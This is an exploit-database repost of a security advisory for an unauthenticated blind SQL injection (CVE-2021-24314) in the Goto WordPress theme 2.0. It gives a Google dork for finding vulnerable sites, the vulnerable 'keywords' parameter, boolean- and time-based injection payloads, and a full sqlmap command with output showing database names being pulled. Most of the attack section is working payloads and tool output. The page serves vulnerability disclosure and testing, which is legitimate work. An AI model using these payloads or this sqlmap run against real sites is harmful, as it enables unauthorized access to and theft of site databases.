Advertisement






Goto WordPress Theme 2.0 - Unauthenticated Blind SQL Injection

CVE Category Price Severity
CVE-2021-24314 CWE-89 Not specified High
Author Risk Exploitation Type Date
Exploit Alert High Remote 2021-05-17
CPE
cpe:cpe:/a:wordpress:wordpress
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050089

Below is a copy:

Goto WordPress Theme 2.0 - Unauthenticated Blind SQL Injection
/*!
- # VULNERABILITY: Goto WordPress Theme 2.0 - Unauthenticated Blind SQL Injection
- # GOOGLE DORK: inurl:/wp-content/themes/goto/
- # DATE: 2021-03-24
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: BoostifyThemes [ https://boostifythemes.com ]
- # SOFTWARE VERSION: 2.0
- # SOFTWARE LINK: https://themeforest.net/item/goto-tour-travel-wordpress-theme/21822828
- # CVSS: AV:N/AC:L/PR:N/UI:N/S:C
- # CWE: CWE-89
- # CVE: CVE-2021-24314
*/



### -- [ Info: ]

[i] An Unauthenticated Blind SQL Injection vulnerability was discovered in the Goto theme v2.0 for WordPress.

[i] Vulnerable parameter(s): ?keywords=.

[i] Blind SQL Injection type(s): boolean-based, time-based.



### -- [ Impact: ]

[~] Unauthorized access to sensitive data from the database (passwords, credit card details, personal user information), database data modification (Insert/Update/Delete), administration operations execution on the database (such as shutdown the DBMS), in some cases issue commands to the OS or performing a DoS attack.



### -- [ Payloads: ]

[$] 13%' AND 7478=7478 AND 'QcwX%'='QcwX&start_date=13

[$] 13%' AND (SELECT 1362 FROM (SELECT(SLEEP(8)))kpeo) AND 'ThDS%'='ThDS&start_date=13



### -- [ PoC | Unauthenticated Blind SQL Injection | Search query (database names): ]

[!] sqlmap --url="https://example.com/tour-list/?keywords=13&start_date=13" --random-agent -dbs --level=3 --threads=4 --dbms=MySQL -p keywords
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:20:47 /2021-03-24/

[02:20:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keywords (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keywords=13%' AND 7478=7478 AND 'QcwX%'='QcwX&start_date=13

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keywords=13%' AND (SELECT 1362 FROM (SELECT(SLEEP(5)))kpeo) AND 'ThDS%'='ThDS&start_date=13
---
[02:20:58] [INFO] testing MySQL
[02:21:00] [WARNING] reflective value(s) found and filtering out
[02:21:00] [INFO] confirming MySQL
[02:21:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.31, PHP 7.3.7, PHP
back-end DBMS: MySQL >= 5.0.0
[02:21:08] [INFO] fetching database names
[02:21:08] [INFO] fetching number of databases
[02:21:28] [INFO] retrieved: 18
[02:23:02] [INFO] retrieved: information_schema
[02:23:48] [INFO] retrieved: 4
[02:24:20] [INFO] retrieved: goto

available databases [2]:
[*] information_schema
[*] goto

[*] ending @ 02:32:25 /2021-03-24/



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum